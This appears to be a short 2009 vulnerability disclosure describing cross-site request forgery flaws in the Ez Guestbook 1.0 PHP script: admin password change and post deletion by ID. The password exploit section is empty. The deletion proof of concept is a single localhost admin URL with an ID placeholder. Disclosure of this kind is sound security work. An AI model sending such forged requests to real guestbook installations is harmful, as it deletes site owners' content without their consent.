[-------------------------------------------------------------------------------------------------] [ Title: Ez Guestbook 1.0 Multiple Vulnerabilities ] [ Author: Milos Zivanovic ] [ Email: milosz.security[at]gmail.com ] [ Date: 14. December 2009. ] [-------------------------------------------------------------------------------------------------] [-------------------------------------------------------------------------------------------------] [ Application: Ez Guestbook ] [ Version: 1.0 ] [ Link: http://www.scriptsez.net/?action=details&cat=Guestbooks&id=11873094083 ] [ Price: 10 USD ] [ Vulnerability: Cross Site Request Forgery ] [-------------------------------------------------------------------------------------------------] Ez Guestbook script version 1.0 suffers from multiple vulnerabilities: [#]Content |--Change admin password |--Remove post by ID [*]Change admin password [EXPLOIT------------------------------------------------------------------------------------------]
[EXPLOIT------------------------------------------------------------------------------------------] [+]Remove post by ID [POC----------------------------------------------------------------------------------------------] http://localhost/ez_gb/admin.php?action=view&do=delete&id=[ID] [POC----------------------------------------------------------------------------------------------] [----------------------------------------------EOF------------------------------------------------]